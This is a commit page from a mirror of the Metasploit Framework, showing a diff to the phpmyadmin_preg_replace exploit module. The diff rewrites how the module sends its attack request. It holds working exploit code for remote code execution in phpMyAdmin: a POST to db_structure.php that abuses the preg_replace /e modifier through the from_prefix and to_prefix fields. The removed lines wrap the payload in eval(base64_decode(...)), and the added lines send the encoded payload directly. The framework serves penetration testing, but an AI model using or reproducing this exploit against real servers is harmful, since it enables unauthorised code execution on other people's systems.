infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Change to send_rq_cgi

unstable
Meatballs 2013-04-26 19:19:11 +01:00
parent 54233e9fba
commit a17d61897d
1 changed files with 15 additions and 30 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

45
modules/exploits/multi/http/phpmyadmin_preg_replace.rb
View File

@ -37,6 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Arch' => ARCH_PHP, 'Arch' => ARCH_PHP,
'Payload' => 'Payload' =>
{ {
'BadChars' => "&\n=+%",
'DisableNops' => true, 'DisableNops' => true,
'Compat' => { 'ConnectionType' => 'find' } 'Compat' => { 'ConnectionType' => 'find' }
}, },
@ -155,37 +156,21 @@ class Metasploit3 < Msf::Exploit::Remote
end end
db = rand_text_alpha(3+rand(3)) db = rand_text_alpha(3+rand(3))
pay = Rex::Text.encode_base64(payload.encoded)
evil = []
evil << "query_type=replace_prefix_tbl"
evil << "db=#{db}"
evil << "selected%5B0%5D=#{db}"
evil << "token=#{token}"
evil << "from_prefix=%2Fe%00"
evil << "to_prefix=#{Rex::Text.uri_encode("eval(base64_decode('#{pay}'))", 'hex-random')}"
evil << "mult_btn=Yes"
data = "" exploit_result = send_request_cgi({
evil.shuffle! 'uri' => uri('db_structure.php'),
0.upto(evil.count-1) do |i| 'method' => 'POST',
if i == 0 'cookie' => cookie,
data << evil[i] 'vars_post' => {
else 'query_type' => 'replace_prefix_tbl',
data << '&' << evil[i] 'db' => db,
end 'selected[0]' => db,
end 'token' => token,
'from_prefix' => "/e\0",
exploit_result = send_request_raw({ 'to_prefix' => payload.encoded,
'uri' => uri('db_structure.php'), 'mult_btn' => 'Yes'
'method' => 'POST', }
'data' => data, },1)
'cookie' => cookie,
'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' }
},2)
if exploit_result
print_error("Response retrieved from server, exploit failed.")
end
end end
end end